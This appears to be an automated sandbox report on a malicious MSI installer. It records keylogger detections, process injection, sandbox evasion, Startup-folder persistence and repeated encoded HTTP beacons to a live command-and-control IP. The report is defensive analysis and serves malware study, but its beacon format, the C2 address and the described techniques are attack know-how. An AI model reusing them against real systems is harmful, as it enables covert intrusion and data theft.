Windows Analysis Report
15e7232gfN.msi

Overview

General Information

Sample Name: 15e7232gfN.msi
Original Sample Name: 6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
Analysis ID: 1280109
MD5: 247a8cc39384e93d258360a11381000f
SHA1: 23893f035f8564dfea5030b9fdd54120d96072bb
SHA256: 6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Creates a thread in another existing process (thread injection)
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Yara detected Keylogger Generic
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4764 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7100 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 7068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 5484 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Autoit3.exe (PID: 4108 cmdline: "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 4696 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • OLicenseHeartbeat.exe (PID: 3132 cmdline: C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe MD5: CFD37109A4E595C2957C5E0ACC198E8A)
      • icacls.exe (PID: 6980 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Autoit3.exe (PID: 7204 cmdline: "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • cmd.exe (PID: 7404 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • ADelRCP.exe (PID: 8100 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
      • SciTE.exe (PID: 7396 cmdline: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe MD5: 91EE39F4A80F60A938095424EEF2C709)
        • msinfo32.exe (PID: 5644 cmdline: C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe MD5: 29F917BF3DE95D7CE5B6B38CB7A895AB)
      • MyProg.exe (PID: 8056 cmdline: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe MD5: FE48113F3A78F980634E8CDACABF5091)
  • ADelRCP.exe (PID: 8016 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8024 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8032 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8040 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8048 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8064 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8072 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8080 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Autoit3.exe PID: 4108 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: cmd.exe PID: 4696 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: Autoit3.exe PID: 7204 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: cmd.exe PID: 7404 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: SciTE.exe PID: 7396 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: http://80.66.88.145:7891/ | Virustotal: Detection: 5%
Source: http://80.66.88.145 | Virustotal: Detection: 6%
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_004089B0 FindFirstFileA, 9_2_004089B0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00408AB8 FindFirstFileA, 9_2_00408AB8
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\

Networking

Source: global traffic | TCP traffic: 80.66.88.145 ports 7891,1,7,8,9,9999
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49767
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 7891
Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49770
Source: Joe Sandbox View | ASN Name: RISS-ASRU
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 658
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 1054
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 81 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoSlcE76cEOrloOlnERZa7vrnQIFHwC&act=1000
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 460
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 145 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnQIFHwC&act=1000
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 524
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 65 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnQIFHwC&act=1000
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 524
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 144 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
Source: global traffic | HTTP traffic detected: POST / HTTP/1.0 Host: 80.66.88.145:7891 Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) Content-Type: application/x-www-form-urlencoded Content-Length: 520
id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: 
id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: 
id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
